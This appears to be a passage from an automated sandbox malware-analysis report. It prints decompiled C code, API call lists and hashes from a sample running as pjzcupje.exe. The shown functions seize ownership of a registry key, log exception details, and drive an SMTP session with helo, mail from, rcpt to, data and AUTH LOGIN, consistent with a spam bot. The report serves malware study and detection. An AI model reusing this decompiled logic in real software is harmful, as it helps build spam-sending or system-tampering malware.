                                                                                                                                  0x00407b86
                                                                                                                                  0x00407b88
                                                                                                                                  0x00407b8c
                                                                                                                                  0x00407b92
                                                                                                                                  0x00407b94
                                                                                                                                  0x00407b9c
                                                                                                                                  0x00407ba2
                                                                                                                                  0x00407ba4
                                                                                                                                  0x00407bab
                                                                                                                                  0x00407bab
                                                                                                                                  0x00407ba4
                                                                                                                                  0x00407bb2
                                                                                                                                  0x00407bb2
                                                                                                                                  0x00000000
                                                                                                                                  0x00407b88

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,?,?), ref: 00407B16
                                                                                                                                  • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
                                                                                                                                  • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
                                                                                                                                  • EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407B8C
                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
                                                                                                                                  • RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00407BB2
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                                                                  • String ID: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe$D
                                                                                                                                  • API String ID: 2976863881-1098992889
                                                                                                                                  • Opcode ID: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                                                                  • Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
                                                                                                                                  • Opcode Fuzzy Hash: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                                                                  • Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406511 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 182COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                  			E00406511(void* __ecx) {
				signed int _t75;
				signed int _t76;
				int _t78;
				void* _t83;
				signed int _t93;
				void* _t95;
				signed int _t99;
				int _t101;
				int _t115;
				int _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t122;
				intOrPtr _t135;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				void* _t144;
				void* _t152;

				_t122 = __ecx;
				_t139 = _t141 - 0x74;
				_t75 =  *(_t139 + 0x7c);
				_t135 =  *((intOrPtr*)(_t75 + 4));
				_t76 =  *_t75;
				 *(_t139 + 0x7c) = _t76;
				_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x5e, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
				_t143 = _t141 - 0x90c + 0x1c;
				_t117 = _t78;
				if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
					E0040E318();
					ExitProcess(0);
				}
				_t83 =  *( *(_t139 + 0x7c) + 0xc);
				__imp__#8( *((intOrPtr*)(_t83 + 4)), E00406511);
				__imp__#8();
				_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
				_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
				E0040EE2A(_t122, _t139 - 0x98, 0, 0x108);
				_t144 = _t143 + 0x48;
				 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));
				_t93 = 3;
				_push(0);
				_push(0);
				 *(_t139 - 0x8c) = _t93;
				 *((intOrPtr*)(_t139 - 0x94)) = 0;
				_push(0);
				 *(_t139 - 0x5c) = _t93;
				_push(0);
				 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));
				 *((intOrPtr*)(_t139 - 0x64)) = 0;
				_t130 =  *((intOrPtr*)(_t135 + 0xb4));
				 *(_t139 - 0x6c) = _t93;
				 *(_t139 + 0x7c) = _t93;
				_push(_t135);
				_push(_t139 - 0x98);
				 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));
				 *((intOrPtr*)(_t139 - 0x74)) = 0;
				_push(0);
				while(1) {
					_t95 = GetCurrentProcess();
					__imp__StackWalk64(0x14c, _t95);
					if(_t95 == 0) {
						break;
					}
					_t95 = 0;
					if( *(_t139 + 0x7c) != 0) {
						if( *((intOrPtr*)(_t139 - 0x88)) != 0) {
							_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
							_t144 = _t144 + 0x1c;
							_t119 = _t119 + _t115;
							_t95 = 0;
						}
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t135);
						_push(_t139 - 0x98);
						_push(_t95);
						continue;
					}
					break;
				}
				 *(_t139 + 0x7c) = _t95;
				_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
				 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;
				do {
					_t137 = 0x412c40 +  *(_t139 + 0x70) * 4;
					if( *_t137 != 0) {
						_t99 =  *(_t139 + 0x7c) & 0x80000007;
						if(_t99 < 0) {
							_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
						}
						if(_t152 == 0) {
							_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
						}
						_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);
						_t144 = _t144 + 0x10;
						_t120 = _t120 + _t101;
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;
					}
					 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
				} while ( *(_t139 + 0x70) < 0x20);
				wsprintfA(_t139 + _t120 - 0x898, "\n");
				E0040E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
				E0040E318();
				return 1;
			}
























                                                                                                                                  0x00406511
                                                                                                                                  0x00406512
                                                                                                                                  0x0040651c
                                                                                                                                  0x00406521
                                                                                                                                  0x00406524
                                                                                                                                  0x00406532
                                                                                                                                  0x0040654d
                                                                                                                                  0x0040654f
                                                                                                                                  0x00406552
                                                                                                                                  0x00406564
                                                                                                                                  0x0040674e
                                                                                                                                  0x00406755
                                                                                                                                  0x00406755
                                                                                                                                  0x0040656d
                                                                                                                                  0x00406578
                                                                                                                                  0x00406587
                                                                                                                                  0x004065a3
                                                                                                                                  0x004065e3
                                                                                                                                  0x004065ee
                                                                                                                                  0x004065f9
                                                                                                                                  0x00406600
                                                                                                                                  0x00406606
                                                                                                                                  0x00406607
                                                                                                                                  0x00406608
                                                                                                                                  0x00406609
                                                                                                                                  0x0040660f
                                                                                                                                  0x0040661b
                                                                                                                                  0x0040661c
                                                                                                                                  0x0040661f
                                                                                                                                  0x00406620
                                                                                                                                  0x00406623
                                                                                                                                  0x00406626
                                                                                                                                  0x0040662c
                                                                                                                                  0x0040662f
                                                                                                                                  0x00406632
                                                                                                                                  0x00406639
                                                                                                                                  0x0040663a
                                                                                                                                  0x0040663d
                                                                                                                                  0x00406640
                                                                                                                                  0x0040668a
                                                                                                                                  0x0040668a
                                                                                                                                  0x00406696
                                                                                                                                  0x0040669e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406643
                                                                                                                                  0x00406648
                                                                                                                                  0x00406650
                                                                                                                                  0x00406671
                                                                                                                                  0x00406673
                                                                                                                                  0x00406676
                                                                                                                                  0x00406678
                                                                                                                                  0x00406678
                                                                                                                                  0x0040667a
                                                                                                                                  0x0040667d
                                                                                                                                  0x0040667e
                                                                                                                                  0x0040667f
                                                                                                                                  0x00406680
                                                                                                                                  0x00406681
                                                                                                                                  0x00406688
                                                                                                                                  0x00406689
                                                                                                                                  0x00000000
                                                                                                                                  0x00406689
                                                                                                                                  0x00000000
                                                                                                                                  0x00406648
                                                                                                                                  0x004066a0
                                                                                                                                  0x004066b3
                                                                                                                                  0x004066b5
                                                                                                                                  0x004066ba
                                                                                                                                  0x004066bd
                                                                                                                                  0x004066c7
                                                                                                                                  0x004066cc
                                                                                                                                  0x004066d1
                                                                                                                                  0x004066d7
                                                                                                                                  0x004066d7
                                                                                                                                  0x004066d8
                                                                                                                                  0x004066eb
                                                                                                                                  0x004066eb
                                                                                                                                  0x004066ff
                                                                                                                                  0x00406701
                                                                                                                                  0x00406704
                                                                                                                                  0x00406706
                                                                                                                                  0x00406706
                                                                                                                                  0x00406709
                                                                                                                                  0x0040670c
                                                                                                                                  0x0040671f
                                                                                                                                  0x00406734
                                                                                                                                  0x0040673c
                                                                                                                                  0x0040674b

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                                                                  • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                                                                  • API String ID: 2400214276-165278494
                                                                                                                                  • Opcode ID: c6cd3b0fe5fb700a95fcef714526d2b1842a8a69a0543b8ebdda1302f97d4f33
                                                                                                                                  • Instruction ID: e6dd37f2d7c7e48b8b359c94d8b0a85da35b73f81cc1d7405eac3f4e783bc3bd
                                                                                                                                  • Opcode Fuzzy Hash: c6cd3b0fe5fb700a95fcef714526d2b1842a8a69a0543b8ebdda1302f97d4f33
                                                                                                                                  • Instruction Fuzzy Hash: 26615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040A7C1 Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 299networkstringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                  			E0040A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
				short _v129;
				char _v132;
				char _v1156;
				signed int _t59;
				int _t60;
				void* _t61;
				char* _t62;
				signed int _t63;
				void* _t65;
				signed int _t68;
				signed int _t74;
				signed int _t76;
				signed int _t78;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;
				signed int _t92;
				void* _t96;
				intOrPtr _t102;
				signed int _t103;
				void* _t104;
				int _t121;
				intOrPtr _t123;
				void* _t124;
				CHAR* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				signed int _t129;
				void* _t130;
				void* _t131;

				_t102 = _a8;
				_t2 = _t102 - 1; // 0x0
				_t59 = _t2;
				_t125 =  &_v132;
				if(_t59 > 0xb) {
					L21:
					_t60 = lstrlenA(_t125);
					_t121 = _t60;
					_t126 = __imp__#19;
					_t61 =  *_t126(_a4, _t125, _t121, 0);
					if(_t61 == _t121) {
						__eflags = _t102 - 6;
						if(_t102 != 6) {
							L28:
							_t127 = __imp__#16;
							_t103 = 0;
							_push(0);
							_v1156 = 0;
							_v132 = 0;
							_push(0x3f6);
							_t62 =  &_v1156;
							while(1) {
								_t63 =  *_t127(_a4, _t62);
								__eflags = _t63;
								if(_t63 <= 0) {
									break;
								}
								_t103 = _t103 + _t63;
								__eflags = _t103 - 0x1f4;
								if(_t103 > 0x1f4) {
									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
									_push(6);
									L72:
									_pop(_t65);
									return _t65;
								}
								__eflags = _v132;
								 *((char*)(_t130 + _t103 - 0x480)) = 0;
								if(_v132 != 0) {
									L33:
									_t68 = E0040EE95( &_v1156,  &_v132);
									__eflags = _t68;
									if(_t68 != 0) {
										break;
									}
									L34:
									_t92 = 0x3f6 - _t103;
									__eflags = _t92;
									_push(0);
									_push(_t92);
									_t62 = _t130 + _t103 - 0x480;
									continue;
								}
								__eflags = _t103 - 3;
								if(_t103 <= 3) {
									goto L34;
								}
								E0040EE08( &_v132,  &_v1156, 4);
								_t131 = _t131 + 0xc;
								__eflags = _v132;
								_v129 = 0x20;
								if(_v132 == 0) {
									goto L34;
								}
								goto L33;
							}
							_t123 = _a8;
							__eflags = _t123 - 7;
							if(_t123 == 7) {
								L23:
								_push(2);
								goto L72;
							}
							__eflags = _t103 - 5;
							if(_t103 <= 5) {
								E0040EF00(_a16, "Too small respons\n");
							} else {
								E0040EE08(_a16,  &_v1156, 0x76);
								_t131 = _t131 + 0xc;
								_a16[0x76] = 0;
							}
							__eflags = _t103 - 5;
							if(_t103 < 5) {
								L71:
								E0040EF00(_a16, "Incorrect respons");
								_push(7);
								goto L72;
							} else {
								__eflags =  *((char*)(_t130 + _t103 - 0x481)) - 0xa;
								if( *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
									goto L71;
								}
								_t104 = E0040EDAC( &_v1156);
								__eflags = _t104 - 0xdc;
								if(_t104 == 0xdc) {
									L50:
									_t129 = 1;
									_t74 = E0040EE95( &_v1156, "ESMTP");
									__eflags = _t74;
									_t52 = _t74 != 0;
									__eflags = _t52;
									 *0x413668 = _t74 & 0xffffff00 | _t52;
									_t123 = 1;
									L51:
									__eflags = _t123 - 0xc;
									if(_t123 != 0xc) {
										L54:
										__eflags = _t129;
										if(_t129 != 0) {
											goto L23;
										}
										_t76 =  *0x413630; // 0x0
										__eflags = _t76;
										if(_t76 == 0) {
											L70:
											_push(0xb);
											goto L72;
										}
										__eflags =  *0x413634 - _t129; // 0x0
										if(__eflags == 0) {
											goto L70;
										}
										__eflags =  *0x413638 - _t129; // 0x0
										if(__eflags == 0) {
											goto L70;
										}
										__eflags = _t123 - 4;
										if(_t123 != 4) {
											L61:
											_t78 = E0040A699( &_v1156,  *0x413634);
											__eflags = _t78;
											if(_t78 == 0) {
												_t80 = E0040A699( &_v1156,  *0x413638);
												__eflags = _t80;
												if(_t80 == 0) {
													__eflags = _t123 - 3;
													if(_t123 == 3) {
														L69:
														_t82 = E0040E819(1, "localcfg", "ip", E004030B5());
														_push( &_v132);
														_t85 = E0040EE95( &_v1156, E0040A7A3(_t82, _t82));
														__eflags = _t85;
														if(_t85 != 0) {
															goto L62;
														}
														goto L70;
													}
													__eflags = _t123 - 4;
													if(_t123 == 4) {
														goto L69;
													}
													__eflags = _t123 - 5;
													if(_t123 == 5) {
														goto L69;
													}
													__eflags = _t123 - 6;
													if(_t123 != 6) {
														goto L70;
													}
													goto L69;
												}
												_push(0xa);
												goto L72;
											}
											L62:
											_push(9);
											goto L72;
										}
										_t87 = E0040A699( &_v1156, _t76);
										__eflags = _t87;
										if(_t87 == 0) {
											goto L61;
										}
										_push(8);
										goto L72;
									}
									__eflags = _t104 - 0x217;
									if(_t104 != 0x217) {
										goto L54;
									}
									_push(0xf);
									goto L72;
								}
								__eflags = _t104 - 0xfa;
								if(_t104 == 0xfa) {
									goto L50;
								}
								__eflags = _t104 - 0x162;
								if(_t104 == 0x162) {
									goto L50;
								}
								__eflags = _t104 - 0xdd;
								if(_t104 == 0xdd) {
									goto L50;
								}
								__eflags = _t104 - 0x14e;
								if(_t104 == 0x14e) {
									goto L50;
								}
								__eflags = _t104 - 0xeb;
								if(_t104 == 0xeb) {
									goto L50;
								}
								_t129 = 0;
								goto L51;
							}
						}
						_t124 = 5;
						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
						__eflags = _t96 - _t124;
						if(_t96 == _t124) {
							goto L28;
						}
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
						return _t124;
					}
					if(_t102 != 7) {
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
						_push(5);
						goto L72;
					}
					goto L23;
				}
				switch( *((intOrPtr*)(_t59 * 4 +  &M0040AB51))) {
					case 0:
						goto L28;
					case 1:
						_push(_a12);
						_t100 =  &_v132;
						if( *0x413668 == 0) {
							_push("helo %s\r\n");
						} else {
							_push("ehlo %s\r\n");
						}
						goto L4;
					case 2:
						_push(_a12);
						_push("mail from:<%s>\r\n");
						goto L14;
					case 3:
						_push(_a12);
						_push("rcpt to:<%s>\r\n");
						L14:
						__eax =  &_v132;
						L4:
						wsprintfA(_t100, ??);
						goto L20;
					case 4:
						_push(7);
						_push("data\r\n");
						goto L19;
					case 5:
						goto L21;
					case 6:
						_push(7);
						_push("quit\r\n");
						goto L19;
					case 7:
						goto L21;
					case 8:
						_push(0xd);
						_push("AUTH LOGIN\r\n");
						L19:
						__eax =  &_v132;
						_push( &_v132);
						__eax = E0040EE08();
						goto L20;
					case 9:
						__eax = _a12;
						_t9 = __eax + 1; // 0x1
						__edx = _t9;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
							__eflags = __cl;
						} while (__cl != 0);
						goto L9;
					case 0xa:
						__eax = _a12;
						_t15 = __eax + 1; // 0x1
						__edx = _t15;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
							__eflags = __cl;
						} while (__cl != 0);
						L9:
						__eax = __eax - __edx;
						 *((char*)(__ebp + __eax - 0x80)) = 0;
						L20:
						_t131 = _t131 + 0xc;
						goto L21;
				}
			}


































                                                                                                                                  0x0040a7cb
                                                                                                                                  0x0040a7cf
                                                                                                                                  0x0040a7cf
                                                                                                                                  0x0040a7d3
                                                                                                                                  0x0040a7d9
                                                                                                                                  0x0040a87d
                                                                                                                                  0x0040a87e
                                                                                                                                  0x0040a886
                                                                                                                                  0x0040a88d
                                                                                                                                  0x0040a893
                                                                                                                                  0x0040a897
                                                                                                                                  0x0040a8bf
                                                                                                                                  0x0040a8c2
                                                                                                                                  0x0040a8f2
                                                                                                                                  0x0040a8f2
                                                                                                                                  0x0040a8f8
                                                                                                                                  0x0040a8fa
                                                                                                                                  0x0040a900
                                                                                                                                  0x0040a906
                                                                                                                                  0x0040a909
                                                                                                                                  0x0040a90a
                                                                                                                                  0x0040a978
                                                                                                                                  0x0040a97c
                                                                                                                                  0x0040a97e
                                                                                                                                  0x0040a980
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a912
                                                                                                                                  0x0040a914
                                                                                                                                  0x0040a91a
                                                                                                                                  0x0040a9b9
                                                                                                                                  0x0040a9c2
                                                                                                                                  0x0040ab4a
                                                                                                                                  0x0040ab4a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ab4a
                                                                                                                                  0x0040a920
                                                                                                                                  0x0040a924
                                                                                                                                  0x0040a92c
                                                                                                                                  0x0040a954
                                                                                                                                  0x0040a95f
                                                                                                                                  0x0040a966
                                                                                                                                  0x0040a968
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a96a
                                                                                                                                  0x0040a96c
                                                                                                                                  0x0040a96c
                                                                                                                                  0x0040a96e
                                                                                                                                  0x0040a970
                                                                                                                                  0x0040a971
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a971
                                                                                                                                  0x0040a92e
                                                                                                                                  0x0040a931
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a940
                                                                                                                                  0x0040a945
                                                                                                                                  0x0040a948
                                                                                                                                  0x0040a94c
                                                                                                                                  0x0040a952
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a952
                                                                                                                                  0x0040a982
                                                                                                                                  0x0040a985
                                                                                                                                  0x0040a988
                                                                                                                                  0x0040a89e
                                                                                                                                  0x0040a89e
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a89e
                                                                                                                                  0x0040a98e
                                                                                                                                  0x0040a991
                                                                                                                                  0x0040a9d1
                                                                                                                                  0x0040a993
                                                                                                                                  0x0040a99f
                                                                                                                                  0x0040a9a7
                                                                                                                                  0x0040a9aa
                                                                                                                                  0x0040a9aa
                                                                                                                                  0x0040a9d8
                                                                                                                                  0x0040a9db
                                                                                                                                  0x0040ab39
                                                                                                                                  0x0040ab41
                                                                                                                                  0x0040ab48
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a9e1
                                                                                                                                  0x0040a9e1
                                                                                                                                  0x0040a9e9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a9fb
                                                                                                                                  0x0040a9fe
                                                                                                                                  0x0040aa04
                                                                                                                                  0x0040aa32
                                                                                                                                  0x0040aa40
                                                                                                                                  0x0040aa41
                                                                                                                                  0x0040aa46
                                                                                                                                  0x0040aa49
                                                                                                                                  0x0040aa49
                                                                                                                                  0x0040aa4d
                                                                                                                                  0x0040aa52
                                                                                                                                  0x0040aa54
                                                                                                                                  0x0040aa54
                                                                                                                                  0x0040aa57
                                                                                                                                  0x0040aa68
                                                                                                                                  0x0040aa68
                                                                                                                                  0x0040aa6a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aa70
                                                                                                                                  0x0040aa75
                                                                                                                                  0x0040aa77
                                                                                                                                  0x0040ab35
                                                                                                                                  0x0040ab35
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ab35
                                                                                                                                  0x0040aa7d
                                                                                                                                  0x0040aa83
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aa89
                                                                                                                                  0x0040aa8f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aa95
                                                                                                                                  0x0040aa98
                                                                                                                                  0x0040aab4
                                                                                                                                  0x0040aac1
                                                                                                                                  0x0040aac8
                                                                                                                                  0x0040aaca
                                                                                                                                  0x0040aadd
                                                                                                                                  0x0040aae4
                                                                                                                                  0x0040aae6
                                                                                                                                  0x0040aaec
                                                                                                                                  0x0040aaef
                                                                                                                                  0x0040ab00
                                                                                                                                  0x0040ab12
                                                                                                                                  0x0040ab1a
                                                                                                                                  0x0040ab29
                                                                                                                                  0x0040ab31
                                                                                                                                  0x0040ab33
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ab33
                                                                                                                                  0x0040aaf1
                                                                                                                                  0x0040aaf4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aaf6
                                                                                                                                  0x0040aaf9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aafb
                                                                                                                                  0x0040aafe
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aafe
                                                                                                                                  0x0040aae8
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aae8
                                                                                                                                  0x0040aacc
                                                                                                                                  0x0040aacc
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aacc
                                                                                                                                  0x0040aaa2
                                                                                                                                  0x0040aaa9
                                                                                                                                  0x0040aaab
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aaad
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aaad
                                                                                                                                  0x0040aa59
                                                                                                                                  0x0040aa5f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aa61
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aa61
                                                                                                                                  0x0040aa06
                                                                                                                                  0x0040aa0c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aa0e
                                                                                                                                  0x0040aa14
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aa16
                                                                                                                                  0x0040aa1c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aa1e
                                                                                                                                  0x0040aa24
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aa26
                                                                                                                                  0x0040aa2c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aa2e
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aa2e
                                                                                                                                  0x0040a9db
                                                                                                                                  0x0040a8c8
                                                                                                                                  0x0040a8d2
                                                                                                                                  0x0040a8d4
                                                                                                                                  0x0040a8d6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a8e2
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a8eb
                                                                                                                                  0x0040a89c
                                                                                                                                  0x0040a8af
                                                                                                                                  0x0040a8b8
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a8b8
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a89c
                                                                                                                                  0x0040a7df
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a7ed
                                                                                                                                  0x0040a7f0
                                                                                                                                  0x0040a7f3
                                                                                                                                  0x0040a803
                                                                                                                                  0x0040a7f5
                                                                                                                                  0x0040a7f5
                                                                                                                                  0x0040a7f5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a845
                                                                                                                                  0x0040a848
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a852
                                                                                                                                  0x0040a855
                                                                                                                                  0x0040a84d
                                                                                                                                  0x0040a84d
                                                                                                                                  0x0040a7fa
                                                                                                                                  0x0040a7fb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a85c
                                                                                                                                  0x0040a85e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a86a
                                                                                                                                  0x0040a86c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a80a
                                                                                                                                  0x0040a80c
                                                                                                                                  0x0040a871
                                                                                                                                  0x0040a871
                                                                                                                                  0x0040a874
                                                                                                                                  0x0040a875
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a813
                                                                                                                                  0x0040a816
                                                                                                                                  0x0040a816
                                                                                                                                  0x0040a819
                                                                                                                                  0x0040a819
                                                                                                                                  0x0040a81b
                                                                                                                                  0x0040a81c
                                                                                                                                  0x0040a81c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a836
                                                                                                                                  0x0040a839
                                                                                                                                  0x0040a839
                                                                                                                                  0x0040a83c
                                                                                                                                  0x0040a83c
                                                                                                                                  0x0040a83e
                                                                                                                                  0x0040a83f
                                                                                                                                  0x0040a83f
                                                                                                                                  0x0040a820
                                                                                                                                  0x0040a824
                                                                                                                                  0x0040a82f
                                                                                                                                  0x0040a87a
                                                                                                                                  0x0040a87a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • wsprintfA.USER32 ref: 0040A7FB
                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
                                                                                                                                  • send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
                                                                                                                                  • wsprintfA.USER32 ref: 0040A8AF
                                                                                                                                  • send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
                                                                                                                                  • wsprintfA.USER32 ref: 0040A8E2
                                                                                                                                  • recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
